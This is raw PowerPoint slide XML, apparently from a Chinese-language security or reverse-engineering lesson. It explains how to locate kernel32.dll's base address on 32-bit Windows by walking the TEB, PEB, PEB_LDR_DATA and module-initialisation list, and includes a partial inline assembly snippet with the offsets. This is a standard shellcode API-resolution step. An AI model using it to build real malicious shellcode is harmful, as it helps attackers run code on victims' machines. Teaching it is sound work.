                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D02888-4A05-7C44-8237-01F4B4012389}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="3292389"/>
            <a:ext cx="10359374" cy="883909"/>
            <a:chOff x="-10772707" y="765386"/>
            <a:chExt cx="21633244" cy="883909"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{720C1F86-A12B-C397-8441-7E4ADD4C3D95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="765386"/>
              <a:ext cx="1510925" cy="88390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4</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F8F097E8-BBB2-6CE2-73D4-B12B5F3632A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="765386"/>
              <a:ext cx="20122317" cy="88390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PEB_LDR_DATA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结构体偏移位置为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x1C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的地址存放着指向模块初始化链表的头指针 </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InInitializationOrderModuleList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p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE12AC25-A14E-28D2-6C88-5701BF6F4A04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="4292898"/>
            <a:ext cx="10359374" cy="886415"/>
            <a:chOff x="-10772707" y="1050004"/>
            <a:chExt cx="21633244" cy="886415"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="矩形 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23710B4A-5966-6226-AFBA-4223F26EFB05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="1050004"/>
              <a:ext cx="1510925" cy="883907"/>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5</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653628E-9FD2-9067-F603-A82CF2E1A761}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="1052512"/>
              <a:ext cx="20122317" cy="883907"/>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模块初始化链表</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InInitializationOrderModuleList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中按顺序存放着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装入运行时初始化模块的信息，第一个链表结点是</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ntdll.dll</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第二个链表结点就是</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endPar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9" name="组合 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B36EF86-55B1-4229-A930-4CDC304A5EAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="5295915"/>
            <a:ext cx="10359374" cy="883906"/>
            <a:chOff x="-10772707" y="1052513"/>
            <a:chExt cx="21633244" cy="883906"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="矩形 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7472E4AA-BE59-BE30-23C3-8F362ED3B4A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="1052513"/>
              <a:ext cx="1510925" cy="88390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6</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E289A07E-9812-287F-6D4E-9D8F0CD520BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="1052513"/>
              <a:ext cx="20122317" cy="88390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找到属于</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的结点后，在其基础上再偏移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x08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就是</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在内存中的加载基址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256911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一</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US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>kernel32.dll</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43928A29-41E7-E367-3322-F1BAED3EC92F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880153" y="142582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FS</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13" name="组合 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5E9735-DDCC-6E56-9BFD-4B13902B3ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2725958" y="1425820"/>
            <a:ext cx="1404307" cy="353863"/>
            <a:chOff x="1583023" y="1152799"/>
            <a:chExt cx="1404307" cy="353863"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{831486B1-E2E2-7251-1E9C-B70E42B7837D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158302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TEB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52D3621C-6D49-326C-361C-B441A2744C97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="213781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0x30</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C869526-303E-4EA9-A2F0-34900BB9ACA1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2692603" y="1152799"/>
              <a:ext cx="294727" cy="353863"/>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2" name="组合 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{814D7254-4B9F-F347-6758-A3F1C1610915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4421280" y="1425245"/>
            <a:ext cx="1417630" cy="355012"/>
            <a:chOff x="3129918" y="1149276"/>
            <a:chExt cx="1417630" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AC452E7-7C58-1557-74C8-D239979D130C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3129918" y="1149276"/>
              <a:ext cx="55479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PEB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F099DD95-EC3D-B700-E3AE-2897E461D1F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3684708" y="1149276"/>
              <a:ext cx="579781"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E787586B-844F-A740-3041-DE418889155C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4262785" y="1149276"/>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1" name="组合 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD048E3-0CBB-EA3D-60D4-F02FAB09888D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6129925" y="1425245"/>
            <a:ext cx="1441656" cy="355012"/>
            <a:chOff x="4672390" y="1149276"/>
            <a:chExt cx="1441656" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E249C4-0243-20EA-6B05-F668EE2F125B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4672390"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LDR</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8" name="矩形 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A3ACD72-B4C7-8D2E-3DBD-1F89BE8402B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5257552"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0x1C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C08473DF-8815-A3E0-0336-008E7D172E1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5831830" y="1149276"/>
              <a:ext cx="282216"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08" name="组合 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5D6786-FD90-75C5-A23A-6BA4C52A8A76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9250048" y="1425245"/>
            <a:ext cx="1995761" cy="355012"/>
            <a:chOff x="9250048" y="1409252"/>
            <a:chExt cx="1995761" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="矩形 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B35A1D-467C-3201-FF49-D86B6E77D49C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9250048" y="1409252"/>
              <a:ext cx="12588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A4DC0895-0ABC-CF08-3D69-0C12C3495F72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10959581" y="1409252"/>
              <a:ext cx="2862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9" name="矩形 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8F65C3-20FA-73B7-62C9-F9EFEA80738F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10508876" y="1409252"/>
              <a:ext cx="450705"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0x8</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="76" name="直线箭头连接符 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5589AC2-806F-069B-9B19-CD3E8A87FE19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="14" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2311424" y="1602752"/>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FA60A427-D4AB-8B91-D124-96DA45D7B63D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7862596" y="1425245"/>
            <a:ext cx="1096440" cy="355012"/>
            <a:chOff x="7752184" y="1409252"/>
            <a:chExt cx="1096440" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA27784-287C-E7F7-6B0A-650A505F64BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7752184" y="1409252"/>
              <a:ext cx="80974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rPr>
                <a:t>ntdll.dll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3" name="矩形 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{491D5E4B-3C12-B1BA-565D-791EE4D4FFAF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8563861" y="1409252"/>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94" name="矩形 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70956401-5A78-46DB-DEE1-90F2DF7268A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880153" y="2573759"/>
            <a:ext cx="1860621" cy="35689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kennel32.dll</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基地址</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102" name="肘形连接符 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37D19FD-37A9-9D58-C768-B239A6345599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="94" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2810465" y="1957851"/>
            <a:ext cx="8304995" cy="615907"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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3D767799-F189-EDCC-84FD-59EF638A45A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102695" y="1586758"/>
            <a:ext cx="0" cy="366073"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0048AA"/>
            </a:solidFill>
            <a:headEnd type="ova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DF09E9EE-E5EB-BE35-BE60-112AB56B8A1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900793" y="1425820"/>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第一步：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="116" name="直线箭头连接符 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBC58F85-B438-5B7F-0BCC-BB85E333C4D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3987439" y="1607715"/>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737BF94A-6BA1-DBEE-7E92-CE99F2F1FA5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5711107" y="1607714"/>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D4955767-22ED-8BE8-5BAE-CEA36283034F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7424588" y="1607713"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81AC4664-4F20-A96E-06C8-81F6A407BFF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8832945" y="1612908"/>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6465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一</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US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>kernel32.dll</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715052" y="1702983"/>
            <a:ext cx="5229532" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>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mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eax,fs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>:[0x30];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>//PEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>,[eax+0x0c];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>//PEB_LDR_DATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>结构体的地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRP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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>,[eax+0x1c];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>InInitializationOrderModuleList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
